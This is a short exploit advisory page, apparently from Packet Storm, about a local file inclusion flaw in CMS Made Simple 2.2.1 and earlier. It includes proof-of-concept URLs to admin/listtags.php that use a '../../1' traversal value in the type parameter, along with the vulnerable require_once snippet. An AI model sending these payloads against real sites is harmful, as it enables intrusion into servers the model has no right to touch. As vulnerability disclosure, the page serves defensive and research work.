Exploit the possiblities

CMS Made Simple 2.2.1 Local File Inclusion

CMS Made Simple 2.2.1 Local File Inclusion
Posted Jul 2, 2017
Authored by Zhiyang Zeng

CMS Made Simple versions 2.2.1 and below suffers from a local inclusion vulnerability.

tags | exploit, local, file inclusion
MD5 | b3f295af95e08dea0b4737419f60d4db

CMS Made Simple 2.2.1 Local File Inclusion

Change Mirror Download
=======
Details
=======

Software:cmsmadesimple


Homepage:http://www.cmsmadesimple.org/<http://www.cmsmadesimple.org/><http://www.cmsmadesimple.org/>


version:<=2.2.1


description:The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.


========

PoC:

========


For cmsmadesimple <=2.1.6:


The Vulnerability is existing in /cmsms/admin/listtags.php Line 82 and line 54

If there is a file named "1.phpinfo.php" in http://127.0.0.1/1.phpinfo.php

So when we visit the following link:

http://127.0.0.1/cmsms/admin/listtags.php?_sk_=08852e62af02bc03&action=showpluginhelp

http://127.0.0.1/cmsms/admin/listtags.php?_sk_=08852e62af02bc03&action=showpluginhelp&plugin=phpinfo&
type=../../1

local file inclusion successfully!


For cmsmadesimple <=2.2.1:


Current version is still vulnerable.


if ($action == "showpluginhelp") {
$content = '';
$file = $find_file("$type.$plugin.php");
if( is_file($file) ) require_once($file);


=========

Reference

==========


https://lightrains.org/local-file-inclusion-in-cmsmadesimple/





Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

February 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    15 Files
  • 2
    Feb 2nd
    15 Files
  • 3
    Feb 3rd
    15 Files
  • 4
    Feb 4th
    13 Files
  • 5
    Feb 5th
    16 Files
  • 6
    Feb 6th
    15 Files
  • 7
    Feb 7th
    15 Files
  • 8
    Feb 8th
    15 Files
  • 9
    Feb 9th
    18 Files
  • 10
    Feb 10th
    8 Files
  • 11
    Feb 11th
    8 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    15 Files
  • 14
    Feb 14th
    15 Files
  • 15
    Feb 15th
    17 Files
  • 16
    Feb 16th
    18 Files
  • 17
    Feb 17th
    37 Files
  • 18
    Feb 18th
    2 Files
  • 19
    Feb 19th
    16 Files
  • 20
    Feb 20th
    11 Files
  • 21
    Feb 21st
    3 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close